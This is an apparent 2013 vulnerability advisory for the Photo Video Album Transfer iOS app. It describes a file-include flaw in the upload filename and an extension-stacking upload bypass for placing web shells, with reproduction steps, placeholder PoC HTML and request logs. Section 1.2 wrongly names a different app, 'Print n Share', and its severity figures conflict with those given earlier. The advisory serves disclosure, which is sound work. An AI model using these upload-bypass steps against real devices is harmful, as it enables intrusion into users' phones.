Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities

EDB-ID:

30215

CVE:

N/A




Platform:

iOS

Date:

2013-12-11


Document Title:
===============
Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1166


Release Date:
=============
2013-12-10


Vulnerability Laboratory ID (VL-ID):
====================================
1166


Common Vulnerability Scoring System:
====================================
8.8


Product & Service Introduction:
===============================
Download the photos & videos from your iPhones Library to computer / PC;Upload photos & videos from your computer;
Transfer photos in full resolution in *.png, *.jpg, *.zip formats;No limit of the number, size or quality of the 
transferred photos;Photo Video Album Transfer is a multifunctional and easy-to-use app. It allows to transfer 
photos and videos from iPhone to iPhone, from iPhone to computer and reverse. Now you can easily manage your 
photo or video transfer and forget about cables, additional hardware and expensive programs. Transfer any number 
of photos and videos using this irreplaceable application for iPhone.

(Copy of the Homepage: https://itunes.apple.com/en/app/photo-video-album-transfer/id682294794 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Photo Video Album Transfer v1.0 mobile app for apple iOS.


Vulnerability Disclosure Timeline:
==================================
2013-12-09:    Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Apple AppStore
Product: Photo Video Album Transfer - Mobile Application (Igor Ciobanu) 1.0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
1.1
A local file/path include web vulnerability has been discovered in the official Photo Video Album Transfer v1.0 mobile app for apple iOS.
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service.

The remote file include web vulnerability is located in the vulnerable filename value of the iOS Transfer Utility (web interface) module. 
Remote attackers can manipulate the filename value in the POST method request of the browse file upload form to cpmpromise the mobile app.
Remote attackers are able to include own local files by usage of the browse file upload module. The attack vecotor is persistent and the 
request method is POST. The file include execute occcurs in the main file dir index list were the filenames are visible listed. The security 
risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.8(+).

Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. 
Successful exploitation of the vulnerability results in unauthorized local file uploads and path requests to compromise the device or mobile app.

Request Method(s):
				[+] [POST]

Vulnerable Module(s):
				[+] Browse File Upload - File send & arrival (web interface)

Vulnerable Parameter(s):
				[+] filename

Affected Module(s):
				[+] Index File Dir Listing (http://localhost:8080)



1.2
An arbitrary file upload web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.

The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by renaming the file with 
multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension 
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file 
extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is 
estimated as high with a cvss (common vulnerability scoring system) count of 6.7(+).

Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.


Request Method(s):
				[+] [POST]

Vulnerable Module(s):
				[+] Browse File Upload - File send & arrival (web interface)

Vulnerable Parameter(s):
				[+] filename (multiple extensions)

Affected Module(s):
				[+] Index File Dir Listing (http://localhost:8080)



Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability in the file name can be exploited by remote attackers without user interaction or privileged mobile
web-application user account. For security demonstration or to reproduce the vulnerability follow the provided steps and information below.

Module:	Upload
Input: 	Browse File
Method:	POST


Manual stepst to reproduce the vulnerability ... 

1. Install and start the vulnerable mobile application
2. Open the web-server wifi transfer (localhost:8080)
Note: Start to tamper the browser (http) request and response session of the next POST Request 
3. Click the browse file to upload button and choose a random file of your local hd
4. Change in the POST method request of the upload the filename value and inject your own webshell, remote- or local file
5. The execute after the inject occurs in the main index file dir listing of the iOS Transfer Utility
6. Successful reproduce of the remote vulnerability!


PoC: Index File Dir List - iOS Transfer Utulity (filename)

<input name="file[]" accept="image/jpeg, image/png, video/quicktime, video/x-msvideo, video/x-m4v, 
video/mp4" multiple="" type="file"></label><label><input name="button" id="button" value="Submit" type="submit"></label></form><br>
<table style="margin:0px;" border="0" cellspacing="0" width="100%">
<tbody><tr style="height: 30px; background-color: #CBCABE;">
</tr><tr><td colspan="3">  <a href=".."><b> Refresh</b></a><br><br></td></tr>
<tr><td>  <%20../[FILE INCLUDE VULNERABILITY VIA VULNERABLE FILENAME!]"></td><td>     0.1 Kb</td><td>08.12.2013 15:58</td></tr>
<tr  style='height: 180px;'><td style="text-align: center;" > <a href="IMG_0556_th.png"><img src="IMG_0556_th.png"  
height="110px" style="max-width: 110px"><br>IMG_0556_th.png</a><br>     2.9 Kb</td>
</table>
<input type="hidden" value="numberOfAvailableFiles=IMG_0556_th.png,endOFF"/><br>
</div>
</body></html></iframe></td></tr></tbody></table></div></body></html>



--- PoC Session Request Logs ---
Status: 200[OK]
POST http://192.168.2.106:8080/ 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[59002] Mime Type[application/x-unknown-content-type]
   
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5; 
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
   

Post Data:
POST_DATA[-----------------------------1863134445217
Content-Disposition: form-data; name="file[]"; filename="<../[FILE INCLUDE VULNERABILITY VIA VULNERABLE FILENAME!]>"
Content-Type: image/png

Status: 200 OK
GET http://192.168.2.106:8080/a Load Flags[LOAD_DOCUMENT_URI  ] 
Content Size[0] Mime Type[application/x-unknown-content-type]
   
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5; 
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
   
Response Headers:
Accept-Ranges[bytes]
Content-Length[0]
Date[So., 08 Dez. 2013 14:58:35 GMT]



1.2
The arbitrary file upload and restricted upload bypass vulnerability can be exploited by remote attackers without privileged web-application 
user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided steps and information below.


PoC: 

<body><div class="header" id="header"> 
  </div>
<div class="container" id="container"><br>
<table style="margin:0px;" border="0" cellspacing="0" width="100%">
<tbody><tr style="height: 30px; background-color: #CBCABE;">
</tr><tr><td colspan="3">  <a href=".."><b> Refresh</b></a><br><br>
</td></tr><tr style="height: 180px;">
<td style="text-align: center;"> <a href="file.jpg.gif.js.html.php.gif.jpg[ARBITRARY FILE UPLOAD & RESTRICTED UPLOAD BYPASS VULNERABILITY!]">
<img src="file.jpg.gif.js.html.php.gif.jpg[ARBITRARY FILE UPLOAD & RESTRICTED UPLOAD BYPASS VULNERABILITY!]>" 
style="max-width: 110px" height="110px"><br><iframe src="a"></a><br>     0.1 Kb</td>
<td style="text-align: center;" > <a href="IMG_0441.MOV"><img src="IMG_0441_th.png"  height="110px" style="max-width: 110px">
<br>IMG_0441.MOV</a><br>657665.1 Kb</td>
</table>


--- PoC Session Logs ---

Status: 200[OK]
GET http://192.168.2.106:8080/ 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[58702] Mime Type[application/x-unknown-content-type]
   
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5; 
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Cache-Control[max-age=0]

Response Headers:
Accept-Ranges[bytes]
Content-Length[58702]
Date[So., 08 Dez. 2013 15:34:33 GMT]
16:30:12.476[313ms][total 313ms] 


Status: 200[OK]
GET http://192.168.2.106:8080/file.jpg.gif.js.html.php.gif.jpg[ARBITRARY FILE UPLOAD & RESTRICTED UPLOAD BYPASS VULNERABILITY!]
Load Flags[VALIDATE_ALWAYS ] 
Content Size[124] Mime Type[:image/jpeg]

Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5; 
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Cache-Control[max-age=0]

Response Headers:
Content-Disposition[:attachment; filename="file.jpg.gif.js.html.php.gif.jpg"]
Content-Length[124]
Accept-Ranges[bytes]
Content-Type[:image/jpeg]
Date[So., 08 Dez. 2013 15:34:33 GMT]


Reference(s):
http://localhost:8080/


Solution - Fix & Patch:
=======================
1.1
The file include web vulnerability can be patched by a secure filter mechanism and exception-handlign to prevent code execution via 
filename value.

1.2
Restrict and filter the filename input value in the upload POST method request to ensure the right format is attached.
Restrict the image file access right to view only ;)


Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as critical because of the location in the main filename value.

1.2
The security risk of the arbitrary file upload web vulnerability and restricted upload bypass bug is  estimated high.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright � 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com